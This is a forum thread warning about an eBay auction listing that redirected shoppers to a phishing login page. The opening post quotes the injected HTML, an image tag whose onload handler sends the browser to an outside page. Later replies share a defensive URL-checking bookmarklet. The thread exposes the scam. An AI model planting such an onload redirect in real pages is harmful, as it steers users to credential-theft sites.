Scamming Ebay Ratbastards from Hell
polksda
Posts: 716
These slimeballs are good.... really good.
Headed to the CD category on Ebay. The first listing below looked bizarre (image blurred for decency purposes).
Being curious, I clicked on the auction link and ended up at the page below:
Now, this took me aback for a second, and then I saw the URL in the address bar.
The **** have programmed a redirect into their auction text.
I was able to do a "Save Link As..." and save the source code for the listing page. It's actually plain HTML, part of an IMG tag:
<img src=http://pics.ebaystatic.com/aw/pics/s.gif onload=location="http://holaamigo.50megs.com/main.html">
Hopefully Ebay will implement some parsing to eliminate this loophole.
Be careful out there folks...
[And yes, I reported it to Ebay immediately]
Post edited by RyanC_Masimo on
Comments
-
Wow. That's actually pretty smart on their part. I hope they get caught.
Sharp Elite 70
Anthem D2V 3D
Parasound 5250
Parasound HCA 1000 A
Parasound HCA 1000
Oppo BDP 95
Von Schweikert VR4 Jr R/L Fronts
Von Schweikert LCR 4 Center
Totem Mask Surrounds X4
Hsu ULS-15 Quad Drive Subwoofers
Sony PS3
Squeezebox Touch
Polk Atrium 7s on the patio just to keep my foot in the door. -
Have fun in prison ****.
-
i've never actually seen phishing in action... thanks for the tip!
It's not good, very fundamentally simply not good. - geolemon
"Its not good enough until we have real-time fearmongering. I want my fear mongered as it happens." - Shizelbs -
Shizelbs wrote: Have fun in prison ****.
I doubt that anyone will be caught, let alone be punished.
If you look at the URL, it's hosted at 50megs.com, a free hosting site. These **** set up an account, use it to glean information until the account is shut down, then they move on to another host.
I've reported email-based phishing scams to several free hosts out there that have been hosting these criminals, and the free hosts don't care. I suspect that some of the free hosts (or staff members) are in cahoots, given the lack of action... -
Email based phishing is one thing. Actually hosting it on eBay's site might piss them off to make them pursue it. How far they'll get is another story, but technically they could get the FBI involved.
If you will it, dude, it is no dream.
-
polksda wrote: I doubt that anyone will be caught, let alone be punished.
I doubt it also, but you never know. I certainly hope so though. -
Forgive my obtuseness, but is the scam where you click on the auction and are directed to their phony login screen and when you try to log in they have your name and password?
polkaudio sound quality competitor since 2005
MECA SQ Rookie of the Year 06 ~ MECA State Champ 06,07,08,11 ~ MECA World Finals 2nd place 06,07,08,09
08 Car Audio Nationals 1st ~ 07 N Georgia Nationals 1st ~ 06 Carl Casper Nationals 1st ~ USACi 05 Southeast AutumnFest 1st
polkaudio SR6500 --- polkaudio MM1040 x2 -- Pioneer P99 -- Rockford Fosgate P1000X5D -
EDIT: That's pretty much it, Mac...
Love how the scammers never have learned how to spell...
Anyone else been getting those "ebay" phish-mails that look like an ebay message and start with something along the lines of:
"I need to hear from you about the 'such and such' that I won in your auction #123456."
More later,
Tour...
Vox Copuli
Better to remain silent and be thought a fool, than to open your mouth and remove all doubt. - Old English Proverb
"Death doesn't come with a Uhaul." - Dennis Gardner
"It's easy to get lost in price vs performance vs ego vs illusion." - doro
"There is a certain entertainment value in ripping the occaisonal (sic) buttmunch..." - TroyD -
Yikes!
I've had one of those only once so far back when I was on AOL a couple years ago. I got an email telling me my AOL account was about to be canceled due to a credit card being declined and I had to re-enter all my stats. The link took me to a website that looked identical to AOL's and asked for passwords, credit card numbers and the whole shebang!
I didn't trust it so I called AOL and asked them and she said it was definitely a scam and got all the info and said their security department would look into it.
It looks like they're getting better with these scams. I wonder how many poor saps got suckered into this one?
polkaudio sound quality competitor since 2005
MECA SQ Rookie of the Year 06 ~ MECA State Champ 06,07,08,11 ~ MECA World Finals 2nd place 06,07,08,09
08 Car Audio Nationals 1st ~ 07 N Georgia Nationals 1st ~ 06 Carl Casper Nationals 1st ~ USACi 05 Southeast AutumnFest 1st
polkaudio SR6500 --- polkaudio MM1040 x2 -- Pioneer P99 -- Rockford Fosgate P1000X5D -
If you have any doubts, change your passwords to make things hard for them. Stay ahead of them and watch the URLs.
>This message has been scanned by the NSA and found to be free of harmful intent.< -
even the URLs aren't a sure thing, unfortunately... a clever programmer can hide those, too, which is really frightening...
i personally have all my websites remember me with a cookie (with appropriate security settings, naturally)... that way, it logs me in automatically, and if i see another login screen after that it makes me suspicious by default...
It's not good, very fundamentally simply not good. - geolemon
"Its not good enough until we have real-time fearmongering. I want my fear mongered as it happens." - Shizelbs -
The sad part is, it was probably done from an internet cafe via proxy.
It's a bold scam and a reminder not to surf the internet high. -
I keep this as a notepad file on my desktop. Just open the file and copy and paste this text in the url box to confirm the actual site.
javascript:alert("The actual URL is:\t\t" + location.protocol + "//" + location.hostname + "/" + "\nThe address URL is:\t\t" + location.href + "\n" + "\nIf the server names do not match, this may be a spoof.");
I remember when 'broadband' meant The Go-Go's. -
that's a great little piece of code! thanks!
-
That is pretty cool... I wonder why ebay and other sites that are heavily spoofed don't advertise this code's existence?
On the other hand, according to it, this Polk Audio page is a possible spoof... but then I guess we knew that...
More later,
Tour...
Vox Copuli
Better to remain silent and be thought a fool, than to open your mouth and remove all doubt. - Old English Proverb
"Death doesn't come with a Uhaul." - Dennis Gardner
"It's easy to get lost in price vs performance vs ego vs illusion." - doro
"There is a certain entertainment value in ripping the occaisonal (sic) buttmunch..." - TroyD -
Tour2ma wrote: On the other hand, according to it, this Polk Audio page is a possible spoof... but then I guess we knew that...
It's just the root (the www.polkaudio.com part) that is supposed to be compared... I get that being the same... so Polk isn't a possible spoof. It's just checking the host name, not the entire URL.
If you will it, dude, it is no dream. -
These kind of people really get under my skin......
Alpine: CDA-7949
Alpine: PXA-H600
Alpine: CHA-S624, KCA-420i, KCA-410C
Rainbow: CS 265 Profi Phase Plug / SL 165
ARC Audio: 4150-XXK / 1500v1-XXK
JL Audio: 10W6v2 (x2)
KnuKonceptz
Second Skin